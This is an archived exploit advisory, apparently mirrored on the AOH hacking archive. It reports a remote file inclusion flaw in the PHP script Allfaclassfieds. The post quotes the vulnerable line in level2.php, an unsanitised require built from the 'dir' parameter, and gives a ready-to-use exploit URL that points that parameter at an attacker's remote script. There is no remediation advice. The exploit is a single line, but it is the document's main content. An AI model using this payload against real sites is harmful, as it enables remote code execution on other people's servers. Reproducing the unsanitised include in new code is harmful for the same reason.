AOH :: HP Unsorted A :: TB10554.HTM

Allfaclassfieds (level2.php dir) remote file inclusion



Allfaclassfieds (level2.php dir) remote file inclusion
Allfaclassfieds (level2.php dir) remote file inclusion



Allfaclassfieds  (level2.php dir) remote file inclusion

 --
 Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR@HackerMail.CoM 
 ---

 Script: allfaclassfieds


Download: http://scriptat.com/download.php?sid=718 
 --

 Bug File: level2.php

 Bug code in line 4:
 require("$dir/admin/dp.php");

 --

 Exploit:
http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript] 



-- 
_______________________________________________
Get your free email from http://www.hackermail.com 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.